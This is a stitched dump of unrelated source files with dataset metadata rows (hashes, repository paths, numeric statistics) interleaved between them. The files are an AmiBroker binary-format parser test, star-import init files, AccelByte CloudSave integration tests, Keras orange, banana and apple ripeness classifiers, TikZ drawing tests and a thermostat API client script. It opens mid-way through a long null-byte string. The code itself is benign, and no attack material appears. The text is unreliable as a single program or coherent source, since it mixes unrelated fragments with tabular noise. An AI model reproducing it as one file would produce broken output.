00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00X\x02\x00\x00'
data_parsed=SymbolHeader.parse(defheader)
assert data_parsed["Length"]==600
data_parsed=SymbolHeader.parse(binfile)
assert data_parsed["Ex-Dividend Date"]["Year"] == 2000
assert data_parsed["Ex-Dividend Date"]["Day"] == 1
assert data_parsed["Ex-Dividend Date"]["Month"] == 2
assert True
def test_load_pandas():
test_data_folder = os.path.dirname(__file__)
test_data_file = os.path.join(test_data_folder, "./TestData/s/SPCE")
f = open(test_data_file, "rb")
binfile = f.read()
start = time.perf_counter_ns()
data = SymbolConstruct.parse(binfile)
stop = time.perf_counter_ns()
diff = stop - start
assert len(data["Entries"]) == 600
def test_amisymbolfacade():
test_data_folder = os.path.dirname(__file__)
test_data_file = os.path.join(test_data_folder, "./TestData/s/SPCE")
f = open(test_data_file, "rb")
binfile = f.read()
facade = AmiSymbolDataFacade(binfile)
assert facade.length == 600
test = facade[-1]
sliced = facade[-1 : facade.length - 21 : -1]
assert len(sliced) == 20
sliced = facade[-1:-21:-1]
assert len(sliced) == 20
def test_add_to_amisymbolfacade():
test_data_folder = os.path.dirname(__file__)
test_data_file = os.path.join(test_data_folder, "./TestData/s/SPCE")
f = open(test_data_file, "rb")
binfile = f.read()
facade = AmiSymbolDataFacade(binfile)
assert facade.length == 600
test = facade[-1]
facade += test
assert facade.length == 601
assert facade[-1]["Day"] == facade[-2]["Day"]
assert facade[-1]["Year"] == facade[-2]["Year"]
assert facade[-1]["Month"] == facade[-2]["Month"]
assert facade[-1]["Close"] == facade[-2]["Close"]
assert facade[-1]["Open"] == facade[-2]["Open"]
assert facade[-1]["High"] == facade[-2]["High"]
assert facade[-1]["Low"] == facade[-2]["Low"]
assert facade[-1]["Volume"] == facade[-2]["Volume"]
assert facade[-1]["AUX1"] == facade[-2]["AUX1"]
assert facade[-1]["AUX2"] == facade[-2]["AUX2"]
def test_amistruct_master(master_data):
parsed = Master.parse(master_data)
assert parsed["NumSymbols"] == 5618
assert parsed["Symbols"][0]["Symbol"] == "A"
assert parsed["Symbols"][1]["Symbol"] == "AA"
def test_write_master(master_data):
parsed = Master.parse(master_data)
parsed["Symbols"][0]["Symbol"] = "JD"
newbin = Master.build(parsed)
newparsed = Master.parse(newbin)
assert newparsed["Symbols"][0]["Symbol"] == "JD"
def test_read_symbol_construct(symbol_spce):
space = SymbolConstruct.parse(symbol_spce)
assert space["Entries"][0][DATEPACKED]["Year"] == 2017
def test_write_symbol_construct(symbol_spce):
space = SymbolConstruct.parse(symbol_spce)
newbin = SymbolConstruct.build(space)
space["Entries"][0][DATEPACKED]["Year"] = 2016
space["Entries"][0][OPEN] = -25
newbin = SymbolConstruct.build(space)
newparsed = SymbolConstruct.parse(newbin)
assert newparsed["Entries"][0][DATEPACKED]["Year"] == 2016
assert newparsed["Entries"][0][OPEN] == -25
def test_AmiReader():
test_data_folder = os.path.dirname(__file__)
test_data_folder = os.path.join(test_data_folder, "./TestData")
amireader = AmiReader(test_data_folder)
symbols = amireader.get_symbols()
assert symbols[0] == "A"
assert symbols[1] == "AA"
spce = amireader.get_symbol_data_dictionary("SPCE")
assert spce["Year"][0] == 2017
assert spce["Month"][0] == 9
assert spce["Day"][0] == 29
def test_reader_SymbolData():
test_data_folder = os.path.dirname(__file__)
test_data_folder = os.path.join(test_data_folder, "./TestData")
amireader = AmiReader(test_data_folder)
spce = amireader.get_symbol_data("SPCE")
data = spce.to_dict()
assert len(data["Close"]) > 20
# Currently the compiled is not faster for this data
# def test_AmiReader_compiled_should_faster():
# test_data_folder = os.path.dirname(__file__)
# test_data_folder = os.path.join(test_data_folder, "./TestData")
# amireader_fast = AmiReader(test_data_folder)
# amireader_slow = AmiReader(test_data_folder, use_compiled=False)
# time_fast=0
# time_slow=0
# num_runs=20
# for i in range(num_runs):
# start=time.perf_counter()
# spce = amireader_fast.get_symbol_data("SPCE")
# end=time.perf_counter()
# time_fast=time_fast+ end-start
#
# start=time.perf_counter()
# spce = amireader_slow.get_symbol_data("SPCE")
# end=time.perf_counter()
# time_slow=time_slow+ end-start
# time_slow=time_slow/num_runs
# time_fast=time_fast/num_runs
#
# assert time_slow > time_fast
| 66.040268
| 4,711
| 0.710163
| 1,856
| 9,840
| 3.674569
| 0.066272
| 1.022287
| 1.528152
| 2.032258
| 0.726979
| 0.707038
| 0.67478
| 0.670235
| 0.657625
| 0.628592
| 0
| 0.274273
| 0.091463
| 9,840
| 148
| 4,712
| 66.486486
| 0.488591
| 0.083943
| 0
| 0.330097
| 0
| 0.009709
| 0.566518
| 0.522136
| 0
| 1
| 0
| 0
| 0.330097
| 1
| 0.097087
| false
| 0
| 0.058252
| 0
| 0.15534
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
3bdd239689c59ad0c2b2fa15e6560ac52efea118
| 160
|
py
|
Python
|
core/src/wattle/core/models/py/__init__.py
|
wattlecloud/foundation-server
|
e1467d192a7729fa4f116c80dcd001bfd58662e8
|
[
"Apache-2.0"
] | null | null | null |
core/src/wattle/core/models/py/__init__.py
|
wattlecloud/foundation-server
|
e1467d192a7729fa4f116c80dcd001bfd58662e8
|
[
"Apache-2.0"
] | 1
|
2021-07-20T00:28:27.000Z
|
2021-07-20T00:28:27.000Z
|
core/src/wattle/core/models/py/__init__.py
|
wattlecloud/foundation-server
|
e1467d192a7729fa4f116c80dcd001bfd58662e8
|
[
"Apache-2.0"
] | null | null | null |
from .auth import * # noqa: F401, F403
from .common import * # noqa: F401, F403
from .s3 import * # noqa: F401, F403
from .user import * # noqa: F401, F403
| 32
| 41
| 0.65
| 24
| 160
| 4.333333
| 0.375
| 0.384615
| 0.538462
| 0.692308
| 0.634615
| 0
| 0
| 0
| 0
| 0
| 0
| 0.201613
| 0.225
| 160
| 4
| 42
| 40
| 0.637097
| 0.41875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
ce1861746b9b6bee8b14f0392e5fa609e895f1fd
| 125
|
py
|
Python
|
app/routes/__init__.py
|
shelb-doc/Py-News
|
fc74ac63ace5e5c44c7ead4afa406542de11cc16
|
[
"MIT"
] | null | null | null |
app/routes/__init__.py
|
shelb-doc/Py-News
|
fc74ac63ace5e5c44c7ead4afa406542de11cc16
|
[
"MIT"
] | 6
|
2021-04-12T16:27:34.000Z
|
2021-04-30T12:37:21.000Z
|
app/routes/__init__.py
|
shelb-doc/Py-News
|
fc74ac63ace5e5c44c7ead4afa406542de11cc16
|
[
"MIT"
] | null | null | null |
from app.routes import home
from .home import bp as home
from .dashboard import bp as dashboard
from .api import bp as api
| 17.857143
| 38
| 0.776
| 23
| 125
| 4.217391
| 0.391304
| 0.247423
| 0.309278
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.192
| 125
| 7
| 39
| 17.857143
| 0.960396
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
cbfd698dd2dee124e632d6e0a7e6b62fe7eefa1e
| 3,891
|
py
|
Python
|
tests/sample_apps/how_to/_cloudsave.py
|
AccelByte/accelbyte-python-sdk
|
dcd311fad111c59da828278975340fb92e0f26f7
|
[
"MIT"
] | null | null | null |
tests/sample_apps/how_to/_cloudsave.py
|
AccelByte/accelbyte-python-sdk
|
dcd311fad111c59da828278975340fb92e0f26f7
|
[
"MIT"
] | 1
|
2021-10-13T03:46:58.000Z
|
2021-10-13T03:46:58.000Z
|
tests/sample_apps/how_to/_cloudsave.py
|
AccelByte/accelbyte-python-sdk
|
dcd311fad111c59da828278975340fb92e0f26f7
|
[
"MIT"
] | null | null | null |
from ._integration_test_case import IntegrationTestCase
from accelbyte_py_sdk.api.cloudsave.models import ModelsGameRecordRequest
class CloudSaveTestCase(IntegrationTestCase):
post_game_record_handler_key: str = "key"
models_game_record_request: ModelsGameRecordRequest = ModelsGameRecordRequest.create(dict_={"foo": "bar"})
def tearDown(self) -> None:
from accelbyte_py_sdk.api.cloudsave import delete_game_record_handler_v1
_, error = delete_game_record_handler_v1(key=self.post_game_record_handler_key)
self.log_warning(msg=f"Failed to tear down game record handler. {str(error)}", condition=error is not None)
super().tearDown()
def test_delete_game_record_handler_v1(self):
from accelbyte_py_sdk.api.cloudsave import delete_game_record_handler_v1
from accelbyte_py_sdk.api.cloudsave import post_game_record_handler_v1
# arrange
_, error = post_game_record_handler_v1(
body=self.models_game_record_request,
key=self.post_game_record_handler_key
)
self.log_warning(msg=f"Failed to set up game record handler. {str(error)}", condition=error is not None)
# act
_, error = delete_game_record_handler_v1(key=self.post_game_record_handler_key)
# assert
self.assertIsNone(error, error)
def test_get_game_record_handler_v1(self):
from accelbyte_py_sdk.api.cloudsave import get_game_record_handler_v1
from accelbyte_py_sdk.api.cloudsave import post_game_record_handler_v1
# arrange
_, error = post_game_record_handler_v1(
body=self.models_game_record_request,
key=self.post_game_record_handler_key
)
self.log_warning(msg=f"Failed to set up game record handler. {str(error)}", condition=error is not None)
# act
_, error = get_game_record_handler_v1(key=self.post_game_record_handler_key)
# assert
self.assertIsNone(error, error)
def test_post_game_record_handler_v1(self):
from accelbyte_py_sdk.api.cloudsave import delete_game_record_handler_v1
from accelbyte_py_sdk.api.cloudsave import post_game_record_handler_v1
# arrange
_, _ = delete_game_record_handler_v1(key=self.post_game_record_handler_key)
# act
_, error = post_game_record_handler_v1(
body=self.models_game_record_request,
key=self.post_game_record_handler_key
)
# assert
self.assertIsNone(error, error)
def test_put_game_record_handler_v1(self):
from accelbyte_py_sdk.api.cloudsave import get_game_record_handler_v1
from accelbyte_py_sdk.api.cloudsave import post_game_record_handler_v1
from accelbyte_py_sdk.api.cloudsave import put_game_record_handler_v1
from accelbyte_py_sdk.api.cloudsave.models import ModelsGameRecordRequest
from accelbyte_py_sdk.api.cloudsave.models import ModelsGameRecordResponse
# arrange
_, error = post_game_record_handler_v1(
body=self.models_game_record_request,
key=self.post_game_record_handler_key
)
self.log_warning(msg=f"Failed to set up game record handler. {str(error)}", condition=error is not None)
# act
_, error = put_game_record_handler_v1(
body=ModelsGameRecordRequest.create(
dict_={"foo": "baz"}
),
key=self.post_game_record_handler_key
)
# assert
self.assertIsNone(error, error)
result, error = get_game_record_handler_v1(key=self.post_game_record_handler_key)
self.assertIsNotNone(result)
self.assertIsInstance(result, ModelsGameRecordResponse)
self.assertIsNotNone(result.value)
self.assertIn("foo", result.value)
self.assertEqual("baz", result.value["foo"])
| 39.30303
| 115
| 0.713441
| 497
| 3,891
| 5.17505
| 0.124748
| 0.171073
| 0.257776
| 0.177294
| 0.821928
| 0.795101
| 0.795101
| 0.795101
| 0.778771
| 0.739891
| 0
| 0.00789
| 0.218196
| 3,891
| 98
| 116
| 39.704082
| 0.837607
| 0.019275
| 0
| 0.52381
| 0
| 0
| 0.05969
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 1
| 0.079365
| false
| 0
| 0.222222
| 0
| 0.349206
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
5a42d9e8f1f674629b5751efe57ef4fa0adfa1ac
| 7,667
|
py
|
Python
|
orangelib/build/lib/orangelib/model.py
|
ayoolaolafenwa/orangelib
|
4fe7d88488482e52d466b8021db3b4e4dc80a484
|
[
"MIT"
] | 5
|
2020-06-23T11:47:35.000Z
|
2021-12-18T16:00:18.000Z
|
orangelib/build/lib/orangelib/model.py
|
ayoolaolafenwa/orangelib
|
4fe7d88488482e52d466b8021db3b4e4dc80a484
|
[
"MIT"
] | null | null | null |
orangelib/build/lib/orangelib/model.py
|
ayoolaolafenwa/orangelib
|
4fe7d88488482e52d466b8021db3b4e4dc80a484
|
[
"MIT"
] | 4
|
2020-06-23T11:51:49.000Z
|
2021-11-21T03:44:48.000Z
|
import tensorflow
from tensorflow.keras.layers import *
from tensorflow.keras.models import *
import os
from tensorflow.keras.preprocessing import image
from .net import MobileNetV2
import numpy as np
from tensorflow.keras import backend as K
class OrangeClassifier():
def __init__(self, model_path):
self.model = MobileNetV2(input_shape=(224, 224, 3), num_classes=2)
self.model.load_weights(model_path)
self.class_map = {0:"ripe orange",1:"unripe orange"}
def preprocess_input(self,x):
x *= (1. / 255)
return x
def predict(self,image_path):
image_to_predict = image.load_img(image_path, target_size=(
224, 224))
image_to_predict = image.img_to_array(image_to_predict, data_format="channels_last")
image_to_predict = np.expand_dims(image_to_predict, axis=0)
image_to_predict = self.preprocess_input(image_to_predict)
prediction = self.model.predict(image_to_predict)
predicted_class = prediction.argmax()
prediction_confidence = prediction.max() * 100
image_class = self.class_map[predicted_class]
return image_class, prediction_confidence
def predictBatch(self,image_paths):
#create an array to store all processed images
images_array = []
#loop over the batch of images sent
for image_path in image_paths:
image_to_predict = image.load_img(image_path, target_size=(224, 224))
image_to_predict = image.img_to_array(image_to_predict, data_format="channels_last")
image_to_predict = np.expand_dims(image_to_predict, axis=0)
image_to_predict = self.preprocess_input(image_to_predict)
#append the processed images to the array
images_array.append(image_to_predict)
#merge all the images together as one array
images = np.concatenate(images_array)
predictions = self.model.predict(images)
#use axis=1 to compute the argmax and max
predicted_classes = predictions.argmax(axis=1)
prediction_confidence = predictions.max(axis=1) * 100
#create an array to store the names of the classes
predicted_class_names = []
#loop over all the predictions and convert indexes to class names
for predicted_index in predicted_classes:
class_name = self.class_map[predicted_index]
#append the class name to the array
predicted_class_names.append(class_name)
#return the class name list and the confidences
return predicted_class_names,prediction_confidence
class BananaClassifier():
def __init__(self, model_path):
self.model = MobileNetV2(input_shape=(224, 224, 3), num_classes=2)
self.model.load_weights(model_path)
self.class_map = {0:"ripe banana",1:"unripe banana"}
def preprocess_input(self,x):
x *= (1. / 255)
return x
def predict(self,image_path):
image_to_predict = image.load_img(image_path, target_size=(
224, 224))
image_to_predict = image.img_to_array(image_to_predict, data_format="channels_last")
image_to_predict = np.expand_dims(image_to_predict, axis=0)
image_to_predict = self.preprocess_input(image_to_predict)
prediction = self.model.predict(image_to_predict)
predicted_class = prediction.argmax()
prediction_confidence = prediction.max() * 100
image_class = self.class_map[predicted_class]
return image_class, prediction_confidence
def predictBatch(self,image_paths):
#create an array to store all processed images
images_array = []
#loop over the batch of images sent
for image_path in image_paths:
image_to_predict = image.load_img(image_path, target_size=(224, 224))
image_to_predict = image.img_to_array(image_to_predict, data_format="channels_last")
image_to_predict = np.expand_dims(image_to_predict, axis=0)
image_to_predict = self.preprocess_input(image_to_predict)
#append the processed images to the array
images_array.append(image_to_predict)
#merge all the images together as one array
images = np.concatenate(images_array)
predictions = self.model.predict(images)
#use axis=1 to compute the argmax and max
predicted_classes = predictions.argmax(axis=1)
prediction_confidence = predictions.max(axis=1) * 100
#create an array to store the names of the classes
predicted_class_names = []
#loop over all the predictions and convert indexes to class names
for predicted_index in predicted_classes:
class_name = self.class_map[predicted_index]
#append the class name to the array
predicted_class_names.append(class_name)
#return the class name list and the confidences
return predicted_class_names,prediction_confidence
class AppleClassifier():
def __init__(self, model_path):
self.model = MobileNetV2(input_shape=(224, 224, 3), num_classes=2)
self.model.load_weights(model_path)
self.class_map = {0:"green apple",1:"red apple"}
def preprocess_input(self,x):
x *= (1. / 255)
return x
def predict(self,image_path):
image_to_predict = image.load_img(image_path, target_size=(
224, 224))
image_to_predict = image.img_to_array(image_to_predict, data_format="channels_last")
image_to_predict = np.expand_dims(image_to_predict, axis=0)
image_to_predict = self.preprocess_input(image_to_predict)
prediction = self.model.predict(image_to_predict)
predicted_class = prediction.argmax()
prediction_confidence = prediction.max() * 100
image_class = self.class_map[predicted_class]
return image_class, prediction_confidence
def predictBatch(self,image_paths):
#create an array to store all processed images
images_array = []
#loop over the batch of images sent
for image_path in image_paths:
image_to_predict = image.load_img(image_path, target_size=(224, 224))
image_to_predict = image.img_to_array(image_to_predict, data_format="channels_last")
image_to_predict = np.expand_dims(image_to_predict, axis=0)
image_to_predict = self.preprocess_input(image_to_predict)
#append the processed images to the array
images_array.append(image_to_predict)
#merge all the images together as one array
images = np.concatenate(images_array)
predictions = self.model.predict(images)
#use axis=1 to compute the argmax and max
predicted_classes = predictions.argmax(axis=1)
prediction_confidence = predictions.max(axis=1) * 100
#create an array to store the names of the classes
predicted_class_names = []
#loop over all the predictions and convert indexes to class names
for predicted_index in predicted_classes:
class_name = self.class_map[predicted_index]
#append the class name to the array
predicted_class_names.append(class_name)
#return the class name list and the confidences
return predicted_class_names,prediction_confidence
| 35.169725
| 97
| 0.663623
| 974
| 7,667
| 4.946612
| 0.101643
| 0.069738
| 0.139477
| 0.047323
| 0.935243
| 0.935243
| 0.935243
| 0.935243
| 0.935243
| 0.935243
| 0
| 0.020474
| 0.26738
| 7,667
| 217
| 98
| 35.331797
| 0.83728
| 0.154167
| 0
| 0.87931
| 0
| 0
| 0.023394
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.103448
| false
| 0
| 0.068966
| 0
| 0.275862
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ce637de6ea58bcc6eb859600dfc07d1ca4c99a0d
| 4,079
|
py
|
Python
|
test/polygon_test.py
|
TimeExceed/fathom
|
23e611213b25789f3e4931e5f3961bee7500ffa5
|
[
"BSD-3-Clause"
] | null | null | null |
test/polygon_test.py
|
TimeExceed/fathom
|
23e611213b25789f3e4931e5f3961bee7500ffa5
|
[
"BSD-3-Clause"
] | null | null | null |
test/polygon_test.py
|
TimeExceed/fathom
|
23e611213b25789f3e4931e5f3961bee7500ffa5
|
[
"BSD-3-Clause"
] | null | null | null |
import testa
from fathom import Point, ORIGIN
import fathom.tikz as tikz
import fathom.colors as colors
import fathom.line_styles as line_styles
import fathom.corner_styles as corner_styles
@testa.is_(expect=r'''
\documentclass[UTF8]{ctexart}
\usepackage[a0paper]{geometry}
\usepackage{tikz}
\pagestyle{empty}
\begin{document}
\begin{tikzpicture}
\draw (0.50cm,2.00cm)--(1.50cm,2.00cm)--(1.50cm,0.00cm)--(0.50cm,0.00cm)--cycle;
\end{tikzpicture}
\end{document}
''')
def draw_rectangle():
canvas = tikz.Canvas()
canvas.new_rectangle(center=Point(1, 1), width=1, height=2)
return canvas.draw()
@testa.is_(expect=r'''
\documentclass[UTF8]{ctexart}
\usepackage[a0paper]{geometry}
\usepackage{tikz}
\pagestyle{empty}
\begin{document}
\begin{tikzpicture}
\draw (0.00cm,0.00cm)--(1.00cm,2.00cm)--(2.00cm,0.00cm)--cycle;
\end{tikzpicture}
\end{document}
''')
def draw_triangle():
canvas = tikz.Canvas()
canvas.new_triangle(vertices=[ORIGIN, Point(1, 2), Point(2, 0)])
return canvas.draw()
@testa.is_(expect=r'''
\documentclass[UTF8]{ctexart}
\usepackage[a0paper]{geometry}
\usepackage{tikz}
\pagestyle{empty}
\begin{document}
\begin{tikzpicture}
\draw (0.00cm,0.00cm)--(1.00cm,2.00cm)--(2.00cm,0.00cm)--cycle;
\end{tikzpicture}
\end{document}
''')
def draw_polygon():
canvas = tikz.Canvas()
canvas.new_polygon(vertices=[ORIGIN, Point(1, 2), Point(2, 0)])
return canvas.draw()
@testa.is_(expect=r'''
\documentclass[UTF8]{ctexart}
\usepackage[a0paper]{geometry}
\usepackage{tikz}
\pagestyle{empty}
\begin{document}
\begin{tikzpicture}
\draw[color=red] (0.50cm,2.00cm)--(1.50cm,2.00cm)--(1.50cm,0.00cm)--(0.50cm,0.00cm)--cycle;
\end{tikzpicture}
\end{document}
''')
def rectangle_pen_color():
canvas = tikz.Canvas()
canvas.new_rectangle(
center=Point(1, 1),
width=1,
height=2,
pen_color=colors.RED)
return canvas.draw()
@testa.is_(expect=r'''
\documentclass[UTF8]{ctexart}
\usepackage[a0paper]{geometry}
\usepackage{tikz}
\pagestyle{empty}
\begin{document}
\begin{tikzpicture}
\fill[color=red] (0.50cm,2.00cm)--(1.50cm,2.00cm)--(1.50cm,0.00cm)--(0.50cm,0.00cm)--cycle;
\end{tikzpicture}
\end{document}
''')
def rectangle_brush_color():
canvas = tikz.Canvas()
canvas.new_rectangle(
center=Point(1, 1),
width=1,
height=2,
pen_color=colors.INVISIBLE,
brush_color=colors.RED)
return canvas.draw()
@testa.is_(expect=r'''
\documentclass[UTF8]{ctexart}
\usepackage[a0paper]{geometry}
\usepackage{tikz}
\pagestyle{empty}
\begin{document}
\begin{tikzpicture}
\draw[dashed] (0.50cm,2.00cm)--(1.50cm,2.00cm)--(1.50cm,0.00cm)--(0.50cm,0.00cm)--cycle;
\end{tikzpicture}
\end{document}
''')
def rectangle_line_style():
canvas = tikz.Canvas()
canvas.new_rectangle(
center=Point(1, 1),
width=1,
height=2,
line_style=line_styles.DASHED)
return canvas.draw()
@testa.is_(expect=r'''
\documentclass[UTF8]{ctexart}
\usepackage[a0paper]{geometry}
\usepackage{tikz}
\pagestyle{empty}
\begin{document}
\begin{tikzpicture}
\fill[rounded corners=0.15cm,color=red] (0.50cm,2.00cm)--(1.50cm,2.00cm)--(1.50cm,0.00cm)--(0.50cm,0.00cm)--cycle;
\draw[rounded corners=0.15cm] (0.50cm,2.00cm)--(1.50cm,2.00cm)--(1.50cm,0.00cm)--(0.50cm,0.00cm)--cycle;
\end{tikzpicture}
\end{document}
''')
def rectangle_rounded_corners():
canvas = tikz.Canvas()
canvas.new_rectangle(
center=Point(1, 1),
width=1,
height=2,
pen_color=colors.BLACK,
brush_color=colors.RED,
corner_style=corner_styles.DEFAULT_ROUNDED)
return canvas.draw()
@testa.is_(expect=r'''
\documentclass[UTF8]{ctexart}
\usepackage[a0paper]{geometry}
\usepackage{tikz}
\pagestyle{empty}
\begin{document}
\begin{tikzpicture}
\draw (-2.00cm,0.00cm)--(0.00cm,1.50cm)--(2.00cm,0.00cm)--(0.00cm,-1.50cm)--cycle;
\end{tikzpicture}
\end{document}
''')
def draw_diamond():
canvas = tikz.Canvas()
canvas.new_diamond(center=ORIGIN, width=4, height=3)
return canvas.draw()
if __name__ == '__main__':
testa.main()
| 24.572289
| 114
| 0.683746
| 574
| 4,079
| 4.771777
| 0.111498
| 0.040161
| 0.046002
| 0.043812
| 0.835706
| 0.808324
| 0.808324
| 0.794816
| 0.780212
| 0.778751
| 0
| 0.071468
| 0.121844
| 4,079
| 165
| 115
| 24.721212
| 0.693188
| 0
| 0
| 0.77027
| 0
| 0.060811
| 0.525864
| 0.277274
| 0
| 0
| 0
| 0
| 0
| 1
| 0.054054
| false
| 0
| 0.040541
| 0
| 0.148649
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ce7986caebd775ebe07c34802a26ab3bed42cc00
| 2,055
|
py
|
Python
|
server/tests/main.py
|
maresc-g/thermostat
|
be61b7b36d50b6eabebfc63edce4b78151512971
|
[
"MIT"
] | null | null | null |
server/tests/main.py
|
maresc-g/thermostat
|
be61b7b36d50b6eabebfc63edce4b78151512971
|
[
"MIT"
] | null | null | null |
server/tests/main.py
|
maresc-g/thermostat
|
be61b7b36d50b6eabebfc63edce4b78151512971
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import requests as req
import json
r = req.get('http://127.0.0.1:8080/v1/heater_timeslot')
print(f'{r.url} ({r.request.method}) => {r.status_code} : {r.json()}')
payload = {
"target_temperature": 21.47,
"start_day": 1,
"start_time": "21:20:45",
"end_day": 2,
"end_time": "01:06:00",
}
r = req.post('http://127.0.0.1:8080/v1/heater_timeslot', data=json.dumps(payload))
print(f'{r.url} ({r.request.method}) => {r.status_code} : {r.text}')
r = req.get('http://127.0.0.1:8080/v1/heater_timeslot')
print(f'{r.url} ({r.request.method}) => {r.status_code} : {r.json()}')
pk = r.json()[0]["pk"]
payload = {
"pk": pk,
"target_temperature": 17.5,
"start_day": 2,
"start_time": "01:20:45",
"end_day": 6,
"end_time": "22:05:00",
}
r = req.put('http://127.0.0.1:8080/v1/heater_timeslot', data=json.dumps(payload))
print(f'{r.url} ({r.request.method}) => {r.status_code} : {r.text}')
r = req.get('http://127.0.0.1:8080/v1/heater_timeslot')
print(f'{r.url} ({r.request.method}) => {r.status_code} : {r.json()}')
r = req.get('http://127.0.0.1:8080/v1/setting/default_temperature')
print(f'{r.url} ({r.request.method}) => {r.status_code} : {r.json()}')
payload = {
"key": "default_temperature",
"value": "20"
}
r = req.put('http://127.0.0.1:8080/v1/setting', data=json.dumps(payload))
print(f'{r.url} ({r.request.method}) => {r.status_code} : {r.text}')
r = req.get('http://127.0.0.1:8080/v1/setting/default_temperature')
print(f'{r.url} ({r.request.method}) => {r.status_code} : {r.json()}')
r = req.get('http://127.0.0.1:8080/v1/setting/holiday_mode_enabled')
print(f'{r.url} ({r.request.method}) => {r.status_code} : {r.json()}')
payload = {
"key": "holiday_mode_enabled",
"value": "True"
}
r = req.put('http://127.0.0.1:8080/v1/setting', data=json.dumps(payload))
print(f'{r.url} ({r.request.method}) => {r.status_code} : {r.text}')
r = req.get('http://127.0.0.1:8080/v1/setting/holiday_mode_enabled')
print(f'{r.url} ({r.request.method}) => {r.status_code} : {r.json()}')
| 33.145161
| 82
| 0.616545
| 356
| 2,055
| 3.460674
| 0.168539
| 0.035714
| 0.071429
| 0.080357
| 0.796266
| 0.796266
| 0.796266
| 0.796266
| 0.796266
| 0.796266
| 0
| 0.087767
| 0.112895
| 2,055
| 61
| 83
| 33.688525
| 0.588042
| 0.010219
| 0
| 0.5
| 0
| 0.229167
| 0.65273
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.041667
| 0
| 0.041667
| 0.229167
| 0
| 0
| 0
